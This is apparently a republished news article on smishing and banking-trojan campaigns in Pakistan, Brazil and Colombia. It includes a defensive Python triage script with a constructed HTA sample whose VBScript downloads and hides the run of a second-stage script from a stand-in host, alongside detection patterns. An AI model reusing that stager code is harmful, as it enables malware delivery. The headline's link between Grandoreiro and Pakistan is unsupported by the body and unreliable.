Pledge Times

Grandoreiro: banking trojan hits Brazil and Pakistan

by admin_l6ma5gus
June 15, 2024
in Tech

Pakistan has become the latest target of a cybercriminal group called the Smishing Triad, marking the first expansion of its operations beyond the EU, Saudi Arabia, the United Arab Emirates and the United States.

Grandoreiro: what this trojan consists of

“The group’s latest tactic is to send malicious messages in the name of Pakistan Post to mobile carrier customers via iMessage and SMS,” Resecurity said in a report published earlier this week. “The goal is to steal their personal and financial information.” The lure is the classic deceptive-link strategy, the same mechanism by which the Grandoreiro banking trojan is put into circulation.

The cybercriminals, believed to be Chinese speakers, are thought to exploit stolen databases sold on the dark web to send fake SMS messages inviting recipients to click on links under the guise of a failed package delivery, urging them to update their address.

Users who click these links are directed to fake websites that ask them to enter their financial information, presented as a supposed service fee charged for the drop-off.

Deceptive links of this kind are, in essence, how Grandoreiro is put into circulation.

“Apart from Pakistan Post, the group has also been involved in detecting multiple fake delivery package scams,” Resecurity said. “These scams primarily targeted individuals waiting for legitimate packages from reputed courier services such as TCS, Leopard, and FedEx.”

Grandoreiro is not, however, the only cyber threat

Grandoreiro is not the only banking trojan circulating. The story develops as Google has revealed details of another cybercriminal group, tracked as PINEAPPLE, which uses tax- and finance-themed lures in spam messages to entice Brazilian users into opening malicious links or files that ultimately lead to the deployment of the Astaroth (also known as Guildma) information-stealing malware.

“PINEAPPLE often abuses legitimate cloud services in their attempts to distribute malware to users in Brazil,” Mandiant and Google’s Threat Analysis Group (TAG) said. “The group has experimented with a number of cloud platforms, including Google Cloud, Amazon AWS, Microsoft Azure and others.”

It is worth noting that the abuse of Google Cloud Run to spread Astaroth was reported by Cisco Talos in early February, which described it as a high-volume malware distribution campaign targeting users in Latin America (LATAM) and Europe.

The internet giant said it had also observed a Brazil-based threat cluster that it tracks as UNC5176, which targets the financial services, healthcare, retail and hospitality industries with a backdoor called URSA that can steal login credentials for various banking and cryptocurrency sites and email clients.

Deceptive links, including through deceptive advertisements

The attacks use email and malvertising campaigns as distribution vectors for a ZIP file containing an HTML Application (HTA) file that, when opened, drops a VBScript (VBS) file responsible for contacting a remote server and retrieving a second-stage VBS file.

The downloaded VBS file then runs a series of anti-sandbox and anti-VM checks, after which it begins communicating with a command-and-control (C2) server to retrieve and execute the URSA payload.
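
The ZIP → HTA → VBScript downloader chain described above is the kind of attachment a mail gateway or an analyst's triage script can flag before anyone double-clicks it. The Python below is an added example, not code from this page, from Google or from Mandiant: the ZIP archive, the HTA content, the `example.invalid` URL and the indicator list are all constructed for illustration, and the indicators are generic HTA/VBScript download-and-execute and VM-check patterns, not IOCs for URSA or any specific family.

```python
"""Triage a ZIP attachment for an HTA-based VBScript dropper chain.

Added example, not code from the article or from Google/Mandiant. The archive,
HTA body and indicator regexes below are constructed/assumed for illustration;
the indicators are generic patterns, not IOCs for URSA or any other family.
"""
import io
import re
import zipfile

# Constructed sample: a hidden-window HTA whose VBScript fetches a second-stage
# script from a (hypothetical) remote server, writes it to disk and runs it.
SAMPLE_HTA = b"""<html><head>
<HTA:APPLICATION ID="x" WINDOWSTATE="minimize" SHOWINTASKBAR="no">
</head>
<script language="VBScript">
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "http://example.invalid/stage2.vbs", False
http.Send
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile("stage2.vbs", True)
f.Write http.responseText
f.Close
Set sh = CreateObject("WScript.Shell")
sh.Run "wscript.exe stage2.vbs", 0, False
</script></html>"""

# Assumed generic heuristics for a VBScript stager inside an HTA.
INDICATORS = {
    "hidden_window": re.compile(r'WINDOWSTATE\s*=\s*"?minimize|SHOWINTASKBAR\s*=\s*"?no', re.I),
    "http_client": re.compile(r'CreateObject\s*\(\s*"(MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest)', re.I),
    "writes_file": re.compile(r'Scripting\.FileSystemObject|ADODB\.Stream', re.I),
    "spawns_process": re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"|\.Run\s+"', re.I),
    # Common anti-VM probes (WMI hardware classes, hypervisor vendor strings).
    "vm_check": re.compile(r'Win32_ComputerSystem|Win32_BIOS|VMware|VirtualBox|QEMU', re.I),
}


def build_sample_zip(member_name="invoice.hta", member_bytes=SAMPLE_HTA):
    """Return the bytes of a constructed ZIP containing one member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, member_bytes)
    return buf.getvalue()


def extract_vbscript(hta_text):
    """Pull the bodies of <script language="VBScript"> blocks out of an HTA."""
    return re.findall(
        r'<script[^>]*language\s*=\s*"?vbscript"?[^>]*>(.*?)</script>',
        hta_text, re.I | re.S)


def triage_zip(zip_bytes, max_member_size=5 * 1024 * 1024):
    """Scan .hta/.vbs members; return {member: {indicator: bool, ...}}."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".hta", ".vbs")):
                continue
            if info.file_size > max_member_size:  # refuse zip-bomb sized members
                results[info.filename] = {"skipped_too_large": True}
                continue
            text = zf.read(info).decode("latin-1")  # lossless for any byte value
            hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
            hits["vbscript_blocks"] = len(extract_vbscript(text))
            results[info.filename] = hits
    return results


def verdict(report):
    """Flag a member that has an HTTP client plus a file write or process spawn."""
    for name, hits in report.items():
        if hits.get("http_client") and (hits.get("writes_file") or hits.get("spawns_process")):
            return f"suspicious: {name} looks like an HTA download-and-execute stager"
    return "no HTA stager pattern found"


if __name__ == "__main__":
    report = triage_zip(build_sample_zip())
    print(report)
    print(verdict(report))
```

This is a triage heuristic, not a detection of record: a stager that assembles `"MSXML2.XMLHTTP"` from `Chr()` calls or hides behind `Execute` will slip past plain string matching, which is exactly why the anti-sandbox checks in the second stage matter to the attacker and why detonation in an instrumented sandbox remains the stronger control.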

Another financially motivated actor based in Latin America highlighted by Google is FLUXROOT, which is linked to the distribution of the Grandoreiro banking trojan; the company said that in 2023 it removed adversary-hosted phishing pages on Google Cloud that impersonated Mercado Pago with the goal of stealing user credentials.

“More recently, FLUXROOT has continued distribution of Grandoreiro, using cloud services such as Azure and Dropbox to serve the malware,” Google said.

The revelation follows the emergence of a new hacking group dubbed Red Akodon, which has been seen propagating various remote access trojans such as AsyncRAT, Quasar RAT, Remcos RAT and XWorm via phishing messages designed to collect bank account details, email accounts and other credentials.

Targets of the campaign, which has been running since April 2024, include government, healthcare and education organizations, as well as the financial, manufacturing, food, service and transportation sectors in Colombia.

“Red Akodon’s initial access vector is primarily through phishing emails, used as a pretext for purported lawsuits and court summons, apparently coming from Colombian institutions such as the Fiscalía General de la Nación and the Juzgado 06 civil of the Bogotá circuit,” said the Mexican cybersecurity company Scitum.
